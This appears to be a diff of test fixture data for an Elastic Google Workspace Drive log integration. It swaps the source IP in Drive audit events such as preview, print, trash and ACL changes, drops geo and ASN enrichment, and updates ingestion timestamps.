"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"preview\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "preview", "id": "1", 
@@ -1180,31 +964,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1224,7 +990,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1257,8 +1023,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822612300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"print\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398358400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"print\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "print", "id": "1", 
@@ -1277,31 +1043,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1321,7 +1069,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1356,8 +1104,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822613800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"remove_from_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", + "ingested": "2021-12-09T13:39:08.398364Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_from_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", "provider": "drive", "action": "remove_from_folder", "id": "1", @@ -1376,31 +1124,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1421,7 +1151,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1455,8 +1185,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822615200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"rename\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":true},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"bar.gif\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_value\",\"value\":\"foo.gif\",\"new_value\":\"bar.gif\"}]}}", + "ingested": "2021-12-09T13:39:08.398369800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"rename\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":true},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"bar.gif\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_value\",\"value\":\"foo.gif\",\"new_value\":\"bar.gif\"}]}}", "provider": "drive", "action": "rename", "id": "1", 
@@ -1475,31 +1205,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1519,7 +1231,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1552,8 +1264,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822616700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"untrash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398375400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"untrash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "untrash", "id": "1", 
@@ -1572,31 +1284,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1616,7 +1310,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1649,8 +1343,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822618200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"sheets_import_range\",\"parameters\":[{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398381300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"sheets_import_range\",\"parameters\":[{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "sheets_import_range", "id": "1", 
@@ -1669,31 +1363,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1713,7 +1389,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1746,8 +1422,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822619600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"trash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398387Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"trash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "trash", "id": "1", 
@@ -1766,31 +1442,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1810,7 +1468,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1843,8 +1501,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822621100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"remove_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398392700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "remove_lock", "id": "1", 
@@ -1863,31 +1521,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -1907,7 +1547,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -1940,8 +1580,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822622500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"upload\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398398400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"upload\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "upload", "id": "1", 
@@ -1960,31 +1600,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -2004,7 +1626,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -2038,8 +1660,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822624Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"view\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"shared_drive_id\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:39:08.398404Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"view\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"shared_drive_id\",\"value\":\"1234\"}]}}", "provider": "drive", "action": "view", "id": "1", 
@@ -2058,31 +1680,13 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -2102,7 +1706,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -2139,8 +1743,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822625400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_editors\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", + "ingested": "2021-12-09T13:39:08.398409700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_editors\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", "provider": "drive", "action": "change_acl_editors", "id": "1", @@ -2161,31 +1765,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - 